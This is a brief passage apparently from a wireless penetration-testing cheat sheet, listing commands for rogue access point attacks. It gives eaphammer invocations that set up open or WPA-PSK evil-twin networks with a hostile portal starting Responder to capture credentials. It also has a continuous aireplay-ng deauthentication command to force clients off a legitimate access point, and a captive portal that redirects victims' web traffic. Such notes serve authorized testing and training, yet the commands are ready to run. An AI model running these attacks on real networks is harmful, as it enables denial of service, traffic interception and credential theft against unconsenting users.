Open and PSK
info
The option --hostile-portal starts Responder. Depending on the scenario, remove the --hostile-portal option and start tools like responder or bettercap on your own.
./eaphammer -i <wlan0> -b <BSSID> -e <ESSID> -c <channel> --auth open --hostile-portal
./eaphammer -i <wlan0> -b <BSSID> -e <ESSID> -c <channel> --auth wpa-psk --wpa-passphrase <psk>
aireplay-ng -0 0 -a <ap_bssid> <wlan1>
Captive portal (no upstream)â
info
The captive portal redirect HTTP(S) traffic to your captive portal according to your apache2 configuration.
./eaphammer -i <wlan0> -b <BSSID> -e <ESSID> -c <channel> --auth open [--captive-portal]